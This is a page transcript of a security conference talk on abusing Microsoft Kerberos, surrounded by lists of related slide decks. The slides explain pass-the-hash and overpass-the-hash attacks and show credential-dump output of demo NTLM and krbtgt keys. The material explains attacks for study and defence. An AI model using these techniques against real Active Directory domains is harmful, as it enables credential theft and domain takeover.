Anatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoortersAnatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoorters
 
Don't dump thread dumps
Don't dump thread dumpsDon't dump thread dumps
Don't dump thread dumps
 
Troubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support EngineerTroubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support Engineer
 
Linux Cluster next generation
Linux Cluster next generationLinux Cluster next generation
Linux Cluster next generation
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & Heartbeat
 

Similaire à Abusing Microsoft Kerberos - Sorry you guys don’t get it

Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Bob Novas
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engfangjiafu
 
BalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletNemanja Nikodijević
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Praguetomasbart
 
Passbolt Introduction and Usage for secret managment
Passbolt Introduction and Usage for secret managmentPassbolt Introduction and Usage for secret managment
Passbolt Introduction and Usage for secret managmentThierry Gayet
 
Shutdown that bastion host!
Shutdown that bastion host!Shutdown that bastion host!
Shutdown that bastion host!MichaelLudvig
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoastken_kitahara
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Redis - for duplicate detection on real time stream
Redis - for duplicate detection on real time streamRedis - for duplicate detection on real time stream
Redis - for duplicate detection on real time streamCodemotion
 
Redis for duplicate detection on real time stream
Redis for duplicate detection on real time streamRedis for duplicate detection on real time stream
Redis for duplicate detection on real time streamRoberto Franchini
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and moreBrendan Gregg
 
Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Paula Januszkiewicz
 
Infrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black BoxInfrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black BoxMiklos Szel
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a servicePino deCandia
 
Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Svetlin Nakov
 

Similaire à Abusing Microsoft Kerberos - Sorry you guys don’t get it (20)

Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Ssh and sshfp dns records v04
Ssh and sshfp dns records v04
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_eng
 
BalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency wallet
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
 
Passbolt Introduction and Usage for secret managment
Passbolt Introduction and Usage for secret managmentPassbolt Introduction and Usage for secret managment
Passbolt Introduction and Usage for secret managment
 
Shutdown that bastion host!
Shutdown that bastion host!Shutdown that bastion host!
Shutdown that bastion host!
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Redis - for duplicate detection on real time stream
Redis - for duplicate detection on real time streamRedis - for duplicate detection on real time stream
Redis - for duplicate detection on real time stream
 
Redis for duplicate detection on real time stream
Redis for duplicate detection on real time streamRedis for duplicate detection on real time stream
Redis for duplicate detection on real time stream
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPF
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on Lab
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
 
Clear cache memory
Clear cache memoryClear cache memory
Clear cache memory
 
Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?
 
Infrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black BoxInfrastructure review - Shining a light on the Black Box
Infrastructure review - Shining a light on the Black Box
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a service
 
Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)Cryptography for Absolute Beginners (May 2019)
Cryptography for Absolute Beginners (May 2019)
 

Plus de E Hacking

CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyE Hacking
 
Threats against the next billion devices
Threats against the next billion devicesThreats against the next billion devices
Threats against the next billion devicesE Hacking
 
High Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesHigh Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesE Hacking
 
New Developments in the BREACH attack
New Developments in the BREACH attackNew Developments in the BREACH attack
New Developments in the BREACH attackE Hacking
 
Exploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsExploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsE Hacking
 
Most Important steps to become a hacker
Most Important steps to become a hackerMost Important steps to become a hacker
Most Important steps to become a hackerE Hacking
 
Penetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldPenetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldE Hacking
 
Website fingerprinting on TOR
Website fingerprinting on TORWebsite fingerprinting on TOR
Website fingerprinting on TORE Hacking
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidE Hacking
 
Stalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkStalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkE Hacking
 
Hacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingHacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingE Hacking
 
Malicious Domain Profiling
Malicious Domain Profiling Malicious Domain Profiling
Malicious Domain Profiling E Hacking
 
Searching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitSearching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitE Hacking
 
The Machines that Betrayed their Masters
The Machines that Betrayed their MastersThe Machines that Betrayed their Masters
The Machines that Betrayed their MastersE Hacking
 
Detecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsDetecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsE Hacking
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCE Hacking
 
Building Trojan Hardware at Home
Building Trojan Hardware at HomeBuilding Trojan Hardware at Home
Building Trojan Hardware at HomeE Hacking
 
Social Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceSocial Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceE Hacking
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperE Hacking
 

Plus de E Hacking (20)

CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH Academy
 
Threats against the next billion devices
Threats against the next billion devicesThreats against the next billion devices
Threats against the next billion devices
 
High Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesHigh Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilities
 
New Developments in the BREACH attack
New Developments in the BREACH attackNew Developments in the BREACH attack
New Developments in the BREACH attack
 
Exploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsExploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit Systems
 
Most Important steps to become a hacker
Most Important steps to become a hackerMost Important steps to become a hacker
Most Important steps to become a hacker
 
Penetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldPenetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the Battlefield
 
Website fingerprinting on TOR
Website fingerprinting on TORWebsite fingerprinting on TOR
Website fingerprinting on TOR
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in Android
 
Stalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkStalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon Talk
 
Hacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingHacking Wireless World, RFID hacking
Hacking Wireless World, RFID hacking
 
Malicious Domain Profiling
Malicious Domain Profiling Malicious Domain Profiling
Malicious Domain Profiling
 
Searching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitSearching Shodan For Fun And Profit
Searching Shodan For Fun And Profit
 
The Machines that Betrayed their Masters
The Machines that Betrayed their MastersThe Machines that Betrayed their Masters
The Machines that Betrayed their Masters
 
Detecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsDetecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance Systems
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
 
Building Trojan Hardware at Home
Building Trojan Hardware at HomeBuilding Trojan Hardware at Home
Building Trojan Hardware at Home
 
Social Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceSocial Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligence
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections Paper
 

Dernier

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbuapidays
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 

Dernier (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 

Abusing Microsoft Kerberos - Sorry you guys don’t get it

  • 1. by Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don’t get it
  • 2. • Alva `Skip` DUCKWALL @ passingthehash http://passing-the-hash.blogspot.com author of papers about Pass-the-hash & Kerberos Dude in a basement somewhere `whoami` - Skip
  • 3. • Benjamin DELPY @gentilkiwi https://github.com/gentilkiwi http://blog.gentilkiwi.com author of mimikatz is certainly admin of your domain `whoami` - gentilkiwi
  • 4. • We’ll speak about: – Windows, Active Directory – mimikatz – NTLM Hash – Kerberos – Pass-the-hash/keys/ticket – Golden Ticket • We’ll try: 3 live demos. – All of that also works from a non domain-joined computer.
  • 5. Remember about Pass-The-Hash? It still works… despite what the Microsoft KB or Russinovich says
  • 6. • Normal • Pass-the-Hash A little reminder waza 1234/ NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a d0e9aee149655a60 75e4540af1f22d3b LSASS (msv1_0) NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a LSASS (msv1_0) cc36cf7a8514893e fccd332446158b1a
  • 7. Cool isn’t it ? And it works like a charm but with NTLM disabled or “Protected Users”?
  • 8. *or maybe you only don’t want to leave NTLM auth footprints in the Eventlog ;)
  • 9. • It is all about keys and tickets • For Example, let’s use Administrateur who wants to access cifs on a win81 machine on chocolate.local domain • It needs 3 set of keys, all are in the Active Directory – And by default, derived from password. Kerberos
  • 10. 1. The KDC long-term secret key (domain key) – Under the mysterious krbtgt account (rc4, aes128, aes256, des…) – Needed to sign Microsoft specific data in “PAC”, encrypt TGT 2. The Client long-term secret key (derived from password) – Under the user/computer/server account – Needed to check AS-REQ, encrypt session key 3. The Target/Service long-term secret key (derived from password) – Under the computer/server account – Needed to countersign data in “PAC” of TGS, encrypt TGS Kerberos :: keys
  • 11. • Normal Kerberos waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win81
  • 12. • The KDC will validate the authentication if it can decrypt the timestamp with the long-term user key (for RC4, the NTLM hash of the user password) • It issues a TGT representing the user in the domain, for a specified period Kerberos :: preauth RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f5 5865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 KDC waza 1234/ rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a 20140807054500Z timestamp ① AS-REQ ② AS-REPTGT
  • 13. • This TGT is encrypted with a key shared between all KDC – The RC4 key for the krbtgt account : 310b643c5316c8c3c70a10cfb17e2e31 • The KDC adds a Microsoft specific PAC to a structure with user’s information Kerberos :: TGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC TGT Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014 10:46:09 ; 21/07/2014 00:46:09 Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL Target Name (02) : krbtgt ; CHOCOLATE ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f3bf2e0e26903703bec6259b400a586f403bbfe3771cb7972be3c 0868cb9cc69 RC4-HMAC – krbtgt 310b643c5316c8c3c70a10cfb17e2e31 Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
  • 14. • The KDC will create a Microsoft specific structure (PAC) with user information • This PAC is signed with the target key, and the KDC key – for a TGT, the target is also the KDC, so it is the same key, 310b643c5316c8c3c70a10cfb17e2e31 for RC4 – KDC keys are in the krbtgt account Kerberos :: TGT :: PAC RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 User ID 500 Administrateur Groups ID 512 Admins du domaine 519 Administrateurs de l’entreprise 518 Administrateurs du schéma … Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
  • 15. Kerberos :: KRBTGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credenti aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 • KRBTGT account pwd / hash only changes: – Upgrade of domain functional level (NT5->NT6) – Bare metal recovery using restore media – Manually changed (compromise recovery) – In most enterprises this password hasn’t changed in YEARS
  • 16. • All of that is not secret ! – Tickets are ASN.1 encoded • Use OpenSSL or your favorite tool – Kerberos ticket (and KRB-CRED format) • http://www.ietf.org/rfc/rfc4120.txt – Microsoft Specific PAC • http://msdn.microsoft.com/library/cc237917.aspx Kerberos :: internal
  • 18. • Overpass-the-Hash or Pass-the-Key ;) Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage cc36cf7a8514893e fccd332446158b1a
  • 19. • Overpass-the-Hash or Pass-the-Key ;) not limited to RC4 ! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9
  • 20. “Ok, Skip, Kiwi, it’s cool… but how can we find these keys?”
